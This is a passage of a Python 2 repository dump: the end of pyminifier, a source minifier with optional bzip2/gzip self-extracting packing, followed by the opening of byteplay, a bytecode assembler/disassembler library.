407 |     .. code-block:: python
408 | 
409 |         def foo(bar):
410 |          test = "This is a test"
411 |     """
412 |     io_obj = cStringIO.StringIO(source)
413 |     out = ""
414 |     last_lineno = -1
415 |     last_col = 0
416 |     prev_start_line = 0
417 |     indentation = ""
418 |     indentation_level = 0
419 |     for i,tok in enumerate(tokenize.generate_tokens(io_obj.readline)):
420 |         token_type = tok[0]
421 |         token_string = tok[1]
422 |         start_line, start_col = tok[2]
423 |         end_line, end_col = tok[3]
424 |         if start_line > last_lineno:
425 |             last_col = 0
426 |         if token_type == tokenize.INDENT:
427 |             indentation_level += 1
428 |             continue
429 |         if token_type == tokenize.DEDENT:
430 |             indentation_level -= 1
431 |             continue
432 |         indentation = " " * indentation_level
433 |         if start_line > prev_start_line:
434 |             out += indentation + token_string
435 |         elif start_col > last_col:
436 |             out += " " + token_string
437 |         else:
438 |             out += token_string
439 |         prev_start_line = start_line
440 |         last_col = end_col
441 |         last_lineno = end_line
442 |     return out
443 | 
444 | def fix_empty_methods(source):
445 |     """
446 |     Appends 'pass' to empty methods/functions (i.e. where there was nothing but
447 |     a docstring before we removed it =).
448 | 
449 |     Example:
450 | 
451 |     .. code-block:: python
452 | 
453 |         # Note: This triple-single-quote inside a triple-double-quote is also a
454 |         # pyminifier self-test
455 |         def myfunc():
456 |             '''This is just a placeholder function.'''
457 | 
458 |     Will become:
459 | 
460 |     .. code-block:: python
461 | 
462 |         def myfunc(): pass
463 |     """
464 |     def_indentation_level = 0
465 |     output = ""
466 |     just_matched = False
467 |     previous_line = None
468 |     method = re.compile(r'^\s*def\s*.*\(.*\):.*$')
469 |     for line in source.split('\n'):
470 |         if len(line.strip()) > 0: # Don't look at blank lines
471 |             if just_matched == True:
472 |                 this_indentation_level = len(line.rstrip()) - len(line.strip())
473 |                 if def_indentation_level == this_indentation_level:
474 |                     # This method is empty, insert a 'pass' statement
475 |                     output += "%s pass\n%s\n" % (previous_line, line)
476 |                 else:
477 |                     output += "%s\n%s\n" % (previous_line, line)
478 |                 just_matched = False
479 |             elif method.match(line):
480 |                 def_indentation_level = len(line) - len(line.strip()) # A commment
481 |                 just_matched = True
482 |                 previous_line = line
483 |             else:
484 |                 output += "%s\n" % line # Another self-test
485 |         else:
486 |             output += "\n"
487 |     return output
488 | 
489 | def remove_blank_lines(source):
490 |     """
491 |     Removes blank lines from 'source' and returns the result.
492 | 
493 |     Example:
494 | 
495 |     .. code-block:: python
496 | 
497 |         test = "foo"
498 | 
499 |         test2 = "bar"
500 | 
501 |     Will become:
502 | 
503 |     .. code-block:: python
504 | 
505 |         test = "foo"
506 |         test2 = "bar"
507 |     """
508 |     io_obj = cStringIO.StringIO(source)
509 |     source = [a for a in io_obj.readlines() if a.strip()]
510 |     return "".join(source)
511 | 
512 | def minify(source):
513 |     """
514 |     Remove all docstrings, comments, blank lines, and minimize code
515 |     indentation from 'source' then prints the result.
516 |     """
517 |     preserved_shebang = None
518 |     preserved_encoding = None
519 | 
520 |     # This is for things like shebangs that must be precisely preserved
521 |     for line in source.split('\n')[0:2]:
522 |         # Save the first comment line if it starts with a shebang
523 |         # (e.g. '#!/usr/bin/env python') <--also a self test!
524 |         if shebang.match(line): # Must be first line
525 |             preserved_shebang = line
526 |             continue
527 |         # Save the encoding string (must be first or second line in file)
528 |         if encoding.match(line):
529 |             preserved_encoding = line
530 | 
531 |     # Remove multilines (e.g. lines that end with '\' followed by a newline)
532 |     source = multiline_indicator.sub('', source)
533 | 
534 |     # Remove docstrings (Note: Must run before fix_empty_methods())
535 |     source = remove_comments_and_docstrings(source)
536 | 
537 |     # Remove empty (i.e. single line) methods/functions
538 |     source = fix_empty_methods(source)
539 | 
540 |     # Join multiline pairs of parens, brackets, and braces
541 |     source = join_multiline_pairs(source)
542 |     source = join_multiline_pairs(source, '[]')
543 |     source = join_multiline_pairs(source, '{}')
544 | 
545 |     # Remove whitespace between operators:
546 |     source = reduce_operators(source)
547 | 
548 |     # Minimize indentation
549 |     source = dedent(source)
550 | 
551 |     # Re-add preseved items
552 |     if preserved_encoding:
553 |         source = preserved_encoding + "\n" + source
554 |     if preserved_shebang:
555 |         source = preserved_shebang + "\n" + source
556 | 
557 |     # Remove blank lines
558 |     source = remove_blank_lines(source).rstrip('\n') # Stubborn last newline
559 | 
560 |     return source
561 | 
562 | def bz2_pack(source):
563 |     "Returns 'source' as a bzip2-compressed, self-extracting python script."
564 |     import bz2, base64
565 |     out = ""
566 |     compressed_source = bz2.compress(source)
567 |     out += 'import bz2, base64\n'
568 |     out += "exec bz2.decompress(base64.b64decode('"
569 |     out += base64.b64encode((compressed_source))
570 |     out += "'))\n"
571 |     return out
572 | 
573 | def gz_pack(source):
574 |     "Returns 'source' as a gzip-compressed, self-extracting python script."
575 |     import zlib, base64
576 |     out = ""
577 |     compressed_source = zlib.compress(source)
578 |     out += 'import zlib, base64\n'
579 |     out += "exec zlib.decompress(base64.b64decode('"
580 |     out += base64.b64encode((compressed_source))
581 |     out += "'))\n"
582 |     return out
583 | 
584 | # The test.+() functions below are for testing pyminifer...
585 | def test_decorator(f):
586 |     """Decorator that does nothing"""
587 |     return f
588 | 
589 | def test_reduce_operators():
590 |     """Test the case where an operator such as an open paren starts a line"""
591 |     (a, b) = 1, 2 # The indentation level should be preserved
592 |     pass
593 | 
594 | def test_empty_functions():
595 |     """
596 |     This is a test method.
597 |     This should be replaced with 'def empty_method: pass'
598 |     """
599 | 
600 | class test_class(object):
601 |     "Testing indented decorators"
602 | 
603 |     @test_decorator
604 |     def foo(self):
605 |         pass
606 | 
607 | def test_function():
608 |     """
609 |     This function encapsulates the edge cases to prevent them from invading the
610 |     global namespace.
611 |     """
612 |     foo = ("The # character in this string should " # This comment
613 |            "not result in a syntax error") # ...and this one should go away
614 |     test_multi_line_list = [
615 |         'item1',
616 |         'item2',
617 |         'item3'
618 |     ]
619 |     test_multi_line_dict = {
620 |         'item1': 1,
621 |         'item2': 2,
622 |         'item3': 3
623 |     }
624 |     # It may seem strange but the code below tests our docstring removal code.
625 |     test_string_inside_operators = imaginary_function(
626 |         "This string was indented but the tokenizer won't see it that way."
627 |     ) # To understand how this could mess up docstring removal code see the
628 |       # remove_comments_and_docstrings() function starting at this line:
629 |       #     "elif token_type == tokenize.STRING:"
630 |     # This tests remove_extraneous_spaces():
631 |     this_line_has_leading_indentation    = '''<--That extraneous space should be
632 |                                               removed''' # But not these spaces
633 | 
634 | def main():
635 |     usage = '%prog [options] "<input file>"'
636 |     parser = OptionParser(usage=usage, version=__version__)
637 |     parser.disable_interspersed_args()
638 |     parser.add_option(
639 |         "-o", "--outfile",
640 |         dest="outfile",
641 |         default=None,
642 |         help="Save output to the given file.",
643 |         metavar="<file path>"
644 |     )
645 |     parser.add_option(
646 |         "--bzip2",
647 |         action="store_true",
648 |         dest="bzip2",
649 |         default=False,
650 |         help="bzip2-compress the result into a self-executing python script."
651 |     )
652 |     parser.add_option(
653 |         "--gzip",
654 |         action="store_true",
655 |         dest="gzip",
656 |         default=False,
657 |         help="gzip-compress the result into a self-executing python script."
658 |     )
659 |     options, args = parser.parse_args()
660 |     try:
661 |         source = open(args[0]).read()
662 |     except Exception, e:
663 |         print e
664 |         parser.print_help()
665 |         sys.exit(2)
666 |     # Minify our input script
667 |     result = minify(source)
668 |     # Compress it if we were asked to do so
669 |     if options.bzip2:
670 |         result = bz2_pack(result)
671 |     elif options.gzip:
672 |         result = gz_pack(result)
673 |     # Either save the result to the output file or print it to stdout
674 |     if options.outfile:
675 |         f = open(options.outfile, 'w')
676 |         f.write(result)
677 |         f.close()
678 |     else:
679 |         print result
680 | 
681 | if __name__ == "__main__":
682 |     main()
683 | ## end of http://code.activestate.com/recipes/576704/ }}}
684 | 


--------------------------------------------------------------------------------
/byteplay.py:
--------------------------------------------------------------------------------
  1 | # byteplay - Python bytecode assembler/disassembler.
  2 | # Copyright (C) 2006-2010 Noam Yorav-Raphael
  3 | # Homepage: http://code.google.com/p/byteplay
  4 | #
  5 | # This library is free software; you can redistribute it and/or
  6 | # modify it under the terms of the GNU Lesser General Public
  7 | # License as published by the Free Software Foundation; either
  8 | # version 2.1 of the License, or (at your option) any later version.
  9 | #
 10 | # This library is distributed in the hope that it will be useful,
 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 13 | # Lesser General Public License for more details.
 14 | #
 15 | # You should have received a copy of the GNU Lesser General Public
 16 | # License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 17 | 
 18 | # Many thanks to Greg X for adding support for Python 2.6 and 2.7!
 19 | 
 20 | __all__ = ['opmap', 'opname', 'opcodes',
 21 |            'cmp_op', 'hasarg', 'hasname', 'hasjrel', 'hasjabs',
 22 |            'hasjump', 'haslocal', 'hascompare', 'hasfree', 'hascode',
 23 |            'hasflow', 'getse',
 24 |            'Opcode', 'SetLineno', 'Label', 'isopcode', 'Code',
 25 |            'CodeList', 'printcodelist']
 26 | 
 27 | import opcode
 28 | from dis import findlabels
 29 | import types
 30 | from array import array
 31 | import operator
 32 | import itertools
 33 | import sys
 34 | import warnings
 35 | from cStringIO import StringIO
 36 | import marshal 
 37 | 
 38 | ######################################################################
 39 | # Define opcodes and information about them
 40 | 
 41 | python_version = '.'.join(str(x) for x in sys.version_info[:2])
 42 | if python_version not in ('2.4', '2.5', '2.6', '2.7'):
 43 |     warnings.warn("byteplay doesn't support Python version "+python_version)
 44 | 
 45 | class Opcode(int):
 46 |     """An int which represents an opcode - has a nicer repr."""
 47 |     def __repr__(self):
 48 |         return opname[self]
 49 |     __str__ = __repr__
 50 | 
 51 | class CodeList(list):
 52 |     """A list for storing opcode tuples - has a nicer __str__."""
 53 |     def __str__(self):
 54 |         f = StringIO()
 55 |         printcodelist(self, f)
 56 |         return f.getvalue()
 57 | 
 58 | opmap = dict((name.replace('+', '_'), Opcode(code))
 59 |              for name, code in opcode.opmap.iteritems()
 60 |              if name != 'EXTENDED_ARG')
 61 | opname = dict((code, name) for name, code in opmap.iteritems())
 62 | opcodes = set(opname)
 63 | 
 64 | def globalize_opcodes():
 65 |     for name, code in opmap.iteritems():
 66 |         globals()[name] = code
 67 |         __all__.append(name)
 68 | globalize_opcodes()
 69 | 
 70 | cmp_op = opcode.cmp_op
 71 | 
 72 | hasarg = set(x for x in opcodes if x >= opcode.HAVE_ARGUMENT)
 73 | hasconst = set(Opcode(x) for x in opcode.hasconst)
 74 | hasname = set(Opcode(x) for x in opcode.hasname)
 75 | hasjrel = set(Opcode(x) for x in opcode.hasjrel)
 76 | hasjabs = set(Opcode(x) for x in opcode.hasjabs)
 77 | hasjump = hasjrel.union(hasjabs)
 78 | haslocal = set(Opcode(x) for x in opcode.haslocal)
 79 | hascompare = set(Opcode(x) for x in opcode.hascompare)
 80 | hasfree = set(Opcode(x) for x in opcode.hasfree)
 81 | hascode = set([MAKE_FUNCTION, MAKE_CLOSURE])
 82 | 
 83 | class _se:
 84 |     """Quick way of defining static stack effects of opcodes"""
 85 |     # Taken from assembler.py by Phillip J. Eby
 86 |     NOP       = 0,0
 87 | 
 88 |     POP_TOP   = 1,0
 89 |     ROT_TWO   = 2,2
 90 |     ROT_THREE = 3,3
 91 |     ROT_FOUR  = 4,4
 92 |     DUP_TOP   = 1,2
 93 | 
 94 |     UNARY_POSITIVE = UNARY_NEGATIVE = UNARY_NOT = UNARY_CONVERT = \
 95 |         UNARY_INVERT = GET_ITER = LOAD_ATTR = 1,1
 96 | 
 97 |     IMPORT_FROM = 1,2
 98 | 
 99 |     BINARY_POWER = BINARY_MULTIPLY = BINARY_DIVIDE = BINARY_FLOOR_DIVIDE = \
100 |         BINARY_TRUE_DIVIDE = BINARY_MODULO = BINARY_ADD = BINARY_SUBTRACT = \
101 |         BINARY_SUBSCR = BINARY_LSHIFT = BINARY_RSHIFT = BINARY_AND = \
102 |         BINARY_XOR = BINARY_OR = COMPARE_OP = 2,1
103 | 
104 |     INPLACE_POWER = INPLACE_MULTIPLY = INPLACE_DIVIDE = \
105 |         INPLACE_FLOOR_DIVIDE = INPLACE_TRUE_DIVIDE = INPLACE_MODULO = \
106 |         INPLACE_ADD = INPLACE_SUBTRACT = INPLACE_LSHIFT = INPLACE_RSHIFT = \
107 |         INPLACE_AND = INPLACE_XOR = INPLACE_OR = 2,1
108 | 
109 |     SLICE_0, SLICE_1, SLICE_2, SLICE_3 = \
110 |         (1,1),(2,1),(2,1),(3,1)
111 |     STORE_SLICE_0, STORE_SLICE_1, STORE_SLICE_2, STORE_SLICE_3 = \
112 |         (2,0),(3,0),(3,0),(4,0)
113 |     DELETE_SLICE_0, DELETE_SLICE_1, DELETE_SLICE_2, DELETE_SLICE_3 = \
114 |         (1,0),(2,0),(2,0),(3,0)
115 | 
116 |     STORE_SUBSCR = 3,0
117 |     DELETE_SUBSCR = STORE_ATTR = 2,0
118 |     DELETE_ATTR = STORE_DEREF = 1,0
119 |     PRINT_NEWLINE = 0,0
120 |     PRINT_EXPR = PRINT_ITEM = PRINT_NEWLINE_TO = IMPORT_STAR = 1,0
121 |     STORE_NAME = STORE_GLOBAL = STORE_FAST = 1,0
122 |     PRINT_ITEM_TO = 2,0
123 | 
124 |     LOAD_LOCALS = LOAD_CONST = LOAD_NAME = LOAD_GLOBAL = LOAD_FAST = \
125 |         LOAD_CLOSURE = LOAD_DEREF = BUILD_MAP = 0,1
126 | 
127 |     DELETE_FAST = DELETE_GLOBAL = DELETE_NAME = 0,0
128 | 
129 |     EXEC_STMT = 3,0
130 |     BUILD_CLASS = 3,1
131 | 
132 |     STORE_MAP = MAP_ADD = 2,0
133 |     SET_ADD = 1,0
134 | 
135 |     if   python_version == '2.4':
136 |       YIELD_VALUE = 1,0
137 |       IMPORT_NAME = 1,1
138 |       LIST_APPEND = 2,0
139 |     elif python_version == '2.5':
140 |       YIELD_VALUE = 1,1
141 |       IMPORT_NAME = 2,1
142 |       LIST_APPEND = 2,0
143 |     elif python_version == '2.6':
144 |       YIELD_VALUE = 1,1
145 |       IMPORT_NAME = 2,1
146 |       LIST_APPEND = 2,0
147 |     elif python_version == '2.7':
148 |       YIELD_VALUE = 1,1
149 |       IMPORT_NAME = 2,1
150 |       LIST_APPEND = 1,0
151 | 
152 | 
153 | _se = dict((op, getattr(_se, opname[op]))
154 |            for op in opcodes
155 |            if hasattr(_se, opname[op]))
156 | 
157 | hasflow = opcodes - set(_se) - \
158 |           set([CALL_FUNCTION, CALL_FUNCTION_VAR, CALL_FUNCTION_KW,
159 |                CALL_FUNCTION_VAR_KW, BUILD_TUPLE, BUILD_LIST,
160 |                UNPACK_SEQUENCE, BUILD_SLICE, DUP_TOPX,
161 |                RAISE_VARARGS, MAKE_FUNCTION, MAKE_CLOSURE])
162 | if python_version == '2.7':
163 |   hasflow = hasflow - set([BUILD_SET])
164 | 
165 | def getse(op, arg=None):
166 |     """Get the stack effect of an opcode, as a (pop, push) tuple.
167 | 
168 |     If an arg is needed and is not given, a ValueError is raised.
169 |     If op isn't a simple opcode, that is, the flow doesn't always continue
170 |     to the next opcode, a ValueError is raised.
171 |     """
172 |     try:
173 |         return _se[op]
174 |     except KeyError:
175 |         # Continue to opcodes with an effect that depends on arg
176 |         pass
177 | 
178 |     if arg is None:
179 |         raise ValueError, "Opcode stack behaviour depends on arg"
180 | 
181 |     def get_func_tup(arg, nextra):
182 |         if arg > 0xFFFF:
183 |             raise ValueError, "Can only split a two-byte argument"
184 |         return (nextra + 1 + (arg & 0xFF) + 2*((arg >> 8) & 0xFF),
185 |                 1)
186 | 
187 |     if op == CALL_FUNCTION:
188 |         return get_func_tup(arg, 0)
189 |     elif op == CALL_FUNCTION_VAR:
190 |         return get_func_tup(arg, 1)
191 |     elif op == CALL_FUNCTION_KW:
192 |         return get_func_tup(arg, 1)
193 |     elif op == CALL_FUNCTION_VAR_KW:
194 |         return get_func_tup(arg, 2)
195 | 
196 |     elif op == BUILD_TUPLE:
197 |         return arg, 1
198 |     elif op == BUILD_LIST:
199 |         return arg, 1
200 |     elif python_version == '2.7' and op == BUILD_SET:
201 |         return arg, 1
202 |     elif op == UNPACK_SEQUENCE:
203 |         return 1, arg
204 |     elif op == BUILD_SLICE:
205 |         return arg, 1
206 |     elif op == DUP_TOPX:
207 |         return arg, arg*2
208 |     elif op == RAISE_VARARGS:
209 |         return 1+arg, 1
210 |     elif op == MAKE_FUNCTION:
211 |         return 1+arg, 1
212 |     elif op == MAKE_CLOSURE:
213 |         if python_version == '2.4':
214 |             raise ValueError, "The stack effect of MAKE_CLOSURE depends on TOS"
215 |         else:
216 |             return 2+arg, 1
217 |     else:
218 |         raise ValueError, "The opcode %r isn't recognized or has a special "\
219 |               "flow control" % op
220 | 
221 | class SetLinenoType(object):
222 |     def __repr__(self):
223 |         return 'SetLineno'
224 | SetLineno = SetLinenoType()
225 | 
226 | class Label(object):
227 |     pass
228 | 
229 | def isopcode(obj):
230 |     """Return whether obj is an opcode - not SetLineno or Label"""
231 |     return obj is not SetLineno and not isinstance(obj, Label)
232 | 
233 | # Flags from code.h
234 | CO_OPTIMIZED              = 0x0001      # use LOAD/STORE_FAST instead of _NAME
235 | CO_NEWLOCALS              = 0x0002      # only cleared for module/exec code
236 | CO_VARARGS                = 0x0004
237 | CO_VARKEYWORDS            = 0x0008
238 | CO_NESTED                 = 0x0010      # ???
239 | CO_GENERATOR              = 0x0020
240 | CO_NOFREE                 = 0x0040      # set if no free or cell vars
241 | CO_GENERATOR_ALLOWED      = 0x1000      # unused
242 | # The future flags are only used on code generation, so we can ignore them.
243 | # (It does cause some warnings, though.)
244 | CO_FUTURE_DIVISION        = 0x2000
245 | CO_FUTURE_ABSOLUTE_IMPORT = 0x4000
246 | CO_FUTURE_WITH_STATEMENT  = 0x8000
247 | 
248 | 
249 | ######################################################################
250 | # Define the Code class
251 | 
252 | class Code(object):
253 |     """An object which holds all the information which a Python code object
254 |     holds, but in an easy-to-play-with representation.
255 | 
256 |     The attributes are:
257 | 
258 |     Affecting action
259 |     ----------------
260 |     code - list of 2-tuples: the code
261 |     freevars - list of strings: the free vars of the code (those are names
262 |                of variables created in outer functions and used in the function)
263 |     args - list of strings: the arguments of the code
264 |     varargs - boolean: Does args end with a '*args' argument
265 |     varkwargs - boolean: Does args end with a '**kwargs' argument
266 |     newlocals - boolean: Should a new local namespace be created.
267 |                 (True in functions, False for module and exec code)
268 | 
269 |     Not affecting action
270 |     --------------------
271 |     name - string: the name of the code (co_name)
272 |     filename - string: the file name of the code (co_filename)
273 |     firstlineno - int: the first line number (co_firstlineno)
274 |     docstring - string or None: the docstring (the first item of co_consts,
275 |                 if it's str or unicode)
276 | 
277 |     code is a list of 2-tuples. The first item is an opcode, or SetLineno, or a
278 |     Label instance. The second item is the argument, if applicable, or None.
279 |     code can be a CodeList instance, which will produce nicer output when
280 |     being printed.
281 |     """
282 |     def __init__(self, code, freevars, args, varargs, varkwargs, newlocals,
283 |                  name, filename, firstlineno, docstring):
284 |         self.code = code
285 |         self.freevars = freevars
286 |         self.args = args
287 |         self.varargs = varargs
288 |         self.varkwargs = varkwargs
289 |         self.newlocals = newlocals
290 |         self.name = name
291 |         self.filename = filename
292 |         self.firstlineno = firstlineno
293 |         self.docstring = docstring
294 | 
295 |     @staticmethod
296 |     def _findlinestarts(code):
297 |         """Find the offsets in a byte code which are start of lines in the
298 |         source.
299 | 
300 |         Generate pairs (offset, lineno) as described in Python/compile.c.
301 | 
302 |         This is a modified version of dis.findlinestarts, which allows multiple
303 |         "line starts" with the same line number.
304 |         """
305 |         byte_increments = [ord(c) for c in code.co_lnotab[0::2]]
306 |         line_increments = [ord(c) for c in code.co_lnotab[1::2]]
307 | 
308 |         lineno = code.co_firstlineno
309 |         addr = 0
310 |         for byte_incr, line_incr in zip(byte_increments, line_increments):
311 |             if byte_incr:
312 |                 yield (addr, lineno)
313 |                 addr += byte_incr
314 |             lineno += line_incr
315 |         yield (addr, lineno)
316 | 
317 |     @classmethod
318 |     def from_code(cls, co):
319 |         """Disassemble a Python code object into a Code object."""
320 |         co_code = co.co_code
321 |         labels = dict((addr, Label()) for addr in findlabels(co_code))
322 |         linestarts = dict(cls._findlinestarts(co))
323 |         cellfree = co.co_cellvars + co.co_freevars
324 | 
325 |         code = CodeList()
326 |         n = len(co_code)
327 |         i = 0
328 |         extended_arg = 0
329 |         while i < n:
330 |             op = Opcode(ord(co_code[i]))
331 |             if i in labels:
332 |                 code.append((labels[i], None))
333 |             if i in linestarts:
334 |                 code.append((SetLineno, linestarts[i]))
335 |             i += 1
336 |             if op in hascode:
337 |                 lastop, lastarg = code[-1]
338 |                 if lastop != LOAD_CONST:
339 |                     raise ValueError, \
340 |                           "%s should be preceded by LOAD_CONST code" % op
341 |                 code[-1] = (LOAD_CONST, Code.from_code(lastarg))
342 |             if op not in hasarg:
343 |                 code.append((op, None))
344 |             else:
345 |                 arg = ord(co_code[i]) + ord(co_code[i+1])*256 + extended_arg
346 |                 extended_arg = 0
347 |                 i += 2
348 |                 if op == opcode.EXTENDED_ARG:
349 |                     extended_arg = arg << 16
350 |                 elif op in hasconst:
351 |                     code.append((op, co.co_consts[arg]))
352 |                 elif op in hasname:
353 |                     code.append((op, co.co_names[arg]))
354 |                 elif op in hasjabs:
355 |                     code.append((op, labels[arg]))
356 |                 elif op in hasjrel:
357 |                     code.append((op, labels[i + arg]))
358 |                 elif op in haslocal:
359 |                     code.append((op, co.co_varnames[arg]))
360 |                 elif op in hascompare:
361 |                     code.append((op, cmp_op[arg]))
362 |                 elif op in hasfree:
363 |                     code.append((op, cellfree[arg]))
364 |                 else:
365 |                     code.append((op, arg))
366 | 
367 |         varargs = bool(co.co_flags & CO_VARARGS)
368 |         varkwargs = bool(co.co_flags & CO_VARKEYWORDS)
369 |         newlocals = bool(co.co_flags & CO_NEWLOCALS)
370 |         args = co.co_varnames[:co.co_argcount + varargs + varkwargs]
371 |         if co.co_consts and isinstance(co.co_consts[0], basestring):
372 |             docstring = co.co_consts[0]
373 |         else:
374 |             docstring = None
375 |         return cls(code = code,
376 |                    freevars = co.co_freevars,
377 |                    args = args,
378 |                    varargs = varargs,
379 |                    varkwargs = varkwargs,
380 |                    newlocals = newlocals,
381 |                    name = co.co_name,
382 |                    filename = co.co_filename,
383 |                    firstlineno = co.co_firstlineno,
384 |                    docstring = docstring,
385 |                    )
386 | 
387 |     def __eq__(self, other):
388 |         if (self.freevars != other.freevars or
389 |             self.args != other.args or
390 |             self.varargs != other.varargs or
391 |             self.varkwargs != other.varkwargs or
392 |             self.newlocals != other.newlocals or
393 |             self.name != other.name or
394 |             self.filename != other.filename or
395 |             self.firstlineno != other.firstlineno or
396 |             self.docstring != other.docstring or
397 |             len(self.code) != len(other.code)
398 |             ):
399 |             return False
400 | 
401 |         # Compare code. This isn't trivial because labels should be matching,
402 |         # not equal.
403 |         labelmapping = {}
404 |         for (op1, arg1), (op2, arg2) in itertools.izip(self.code, other.code):
405 |             if isinstance(op1, Label):
406 |                 if labelmapping.setdefault(op1, op2) is not op2:
407 |                     return False
408 |             else:
409 |                 if op1 != op2:
410 |                     return False
411 |                 if op1 in hasjump:
412 |                     if labelmapping.setdefault(arg1, arg2) is not arg2:
413 |                         return False
414 |                 elif op1 in hasarg:
415 |                     if arg1 != arg2:
416 |                         return False
417 |         return True
418 | 
419 |     def _compute_flags(self):
420 |         opcodes = set(op for op, arg in self.code if isopcode(op))
421 | 
422 |         optimized = (STORE_NAME not in opcodes and
423 |                      LOAD_NAME not in opcodes and
424 |                      DELETE_NAME not in opcodes)
425 |         generator = (YIELD_VALUE in opcodes)
426 |         nofree = not (opcodes.intersection(hasfree))
427 | 
428 |         flags = 0
429 |         if optimized: flags |= CO_OPTIMIZED
430 |         if self.newlocals: flags |= CO_NEWLOCALS
431 |         if self.varargs: flags |= CO_VARARGS
432 |         if self.varkwargs: flags |= CO_VARKEYWORDS
433 |         if generator: flags |= CO_GENERATOR
434 |         if nofree: flags |= CO_NOFREE
435 |         return flags
436 | 
437 |     def _compute_stacksize(self):
438 |         """Get a code list, compute its maximal stack usage."""
439 |         # This is done by scanning the code, and computing for each opcode
440 |         # the stack state at the opcode.
441 |         code = self.code
442 | 
443 |         # A mapping from labels to their positions in the code list
444 |         label_pos = dict((op, pos)
445 |                          for pos, (op, arg) in enumerate(code)
446 |                          if isinstance(op, Label))
447 | 
448 |         # sf_targets are the targets of SETUP_FINALLY opcodes. They are recorded
449 |         # because they have special stack behaviour. If an exception was raised
450 |         # in the block pushed by a SETUP_FINALLY opcode, the block is popped
451 |         # and 3 objects are pushed. On return or continue, the block is popped
452 |         # and 2 objects are pushed. If nothing happened, the block is popped by
453 |         # a POP_BLOCK opcode and 1 object is pushed by a (LOAD_CONST, None)
454 |         # operation.
455 |         #
456 |         # Our solution is to record the stack state of SETUP_FINALLY targets
457 |         # as having 3 objects pushed, which is the maximum. However, to make
458 |         # stack recording consistent, the get_next_stacks function will always
459 |         # yield the stack state of the target as if 1 object was pushed, but
460 |         # this will be corrected in the actual stack recording.
461 | 
462 |         sf_targets = set(label_pos[arg]
463 |                          for op, arg in code
464 |                          if op == SETUP_FINALLY)
465 | 
466 |         # What we compute - for each opcode, its stack state, as an n-tuple.
467 |         # n is the number of blocks pushed. For each block, we record the number
468 |         # of objects pushed.
469 |         stacks = [None] * len(code)
470 | 
471 |         def get_next_stacks(pos, curstack):
472 |             """Get a code position and the stack state before the operation
473 |             was done, and yield pairs (pos, curstack) for the next positions
474 |             to be explored - those are the positions to which you can get
475 |             from the given (pos, curstack).
476 | 
477 |             If the given position was already explored, nothing will be yielded.
478 |             """
479 |             op, arg = code[pos]
480 | 
481 |             if isinstance(op, Label):
482 |                 # We should check if we already reached a node only if it is
483 |                 # a label.
484 |                 if pos in sf_targets:
485 |                     curstack = curstack[:-1] + (curstack[-1] + 2,)
486 |                 if stacks[pos] is None:
487 |                     stacks[pos] = curstack
488 |                 else:
489 |                     if stacks[pos] != curstack:
490 |                         raise ValueError, "Inconsistent code"
491 |                     return
492 | 
493 |             def newstack(n):
494 |                 # Return a new stack, modified by adding n elements to the last
495 |                 # block
496 |                 if curstack[-1] + n < 0:
497 |                     raise ValueError, "Popped a non-existing element"
498 |                 return curstack[:-1] + (curstack[-1]+n,)
499 | 
500 |             if not isopcode(op):
501 |                 # label or SetLineno - just continue to next line
502 |                 yield pos+1, curstack
503 | 
504 |             elif op in (STOP_CODE, RETURN_VALUE, RAISE_VARARGS):
505 |                 # No place in particular to continue to
506 |                 pass
507 | 
508 |             elif op == MAKE_CLOSURE and python_version == '2.4':
509 |                 # This is only relevant in Python 2.4 - in Python 2.5 the stack
510 |                 # effect of MAKE_CLOSURE can be calculated from the arg.
511 |                 # In Python 2.4, it depends on the number of freevars of TOS,
512 |                 # which should be a code object.
513 |                 if pos == 0:
514 |                     raise ValueError, \
515 |                           "MAKE_CLOSURE can't be the first opcode"
516 |                 lastop, lastarg = code[pos-1]
517 |                 if lastop != LOAD_CONST:
518 |                     raise ValueError, \
519 |                           "MAKE_CLOSURE should come after a LOAD_CONST op"
520 |                 try:
521 |                     nextrapops = len(lastarg.freevars)
522 |                 except AttributeError:
523 |                     try:
524 |                         nextrapops = len(lastarg.co_freevars)
525 |                     except AttributeError:
526 |                         raise ValueError, \
527 |                               "MAKE_CLOSURE preceding const should "\
528 |                               "be a code or a Code object"
529 | 
530 |                 yield pos+1, newstack(-arg-nextrapops)
531 | 
532 |             elif op not in hasflow:
533 |                 # Simple change of stack
534 |                 pop, push = getse(op, arg)
535 |                 yield pos+1, newstack(push - pop)
536 | 
537 |             elif op in (JUMP_FORWARD, JUMP_ABSOLUTE):
538 |                 # One possibility for a jump
539 |                 yield label_pos[arg], curstack
540 | 
541 |             elif python_version < '2.7' and op in (JUMP_IF_FALSE, JUMP_IF_TRUE):
542 |                 # Two possibilities for a jump
543 |                 yield label_pos[arg], curstack
544 |                 yield pos+1, curstack
545 | 
546 |             elif python_version >= '2.7' and op in (POP_JUMP_IF_FALSE, POP_JUMP_IF_TRUE):
547 |                 # Two possibilities for a jump
548 |                 yield label_pos[arg], newstack(-1)
549 |                 yield pos+1, newstack(-1)
550 | 
551 |             elif python_version >= '2.7' and op in (JUMP_IF_TRUE_OR_POP, JUMP_IF_FALSE_OR_POP):
552 |                 # Two possibilities for a jump
553 |                 yield label_pos[arg], curstack
554 |                 yield pos+1, newstack(-1)
555 | 
556 |             elif op == FOR_ITER:
557 |                 # FOR_ITER pushes next(TOS) on success, and pops TOS and jumps
558 |                 # on failure
559 |                 yield label_pos[arg], newstack(-1)
560 |                 yield pos+1, newstack(1)
561 | 
562 |             elif op == BREAK_LOOP:
563 |                 # BREAK_LOOP jumps to a place specified on block creation, so
564 |                 # it is ignored here
565 |                 pass
566 | 
567 |             elif op == CONTINUE_LOOP:
568 |                 # CONTINUE_LOOP jumps to the beginning of a loop which should
569 |                 # already ave been discovered, but we verify anyway.
570 |                 # It pops a block.
571 |                 if python_version == '2.6':
572 |                   pos, stack = label_pos[arg], curstack[:-1]
573 |                   if stacks[pos] != stack: #this could be a loop with a 'with' inside
574 |                     yield pos, stack[:-1] + (stack[-1]-1,)
575 |                   else:
576 |                     yield pos, stack
577 |                 else:
578 |                   yield label_pos[arg], curstack[:-1]
579 | 
580 |             elif op == SETUP_LOOP:
581 |                 # We continue with a new block.
582 |                 # On break, we jump to the label and return to current stack
583 |                 # state.
584 |                 yield label_pos[arg], curstack
585 |                 yield pos+1, curstack + (0,)
586 | 
587 |             elif op == SETUP_EXCEPT:
588 |                 # We continue with a new block.
589 |                 # On exception, we jump to the label with 3 extra objects on
590 |                 # stack
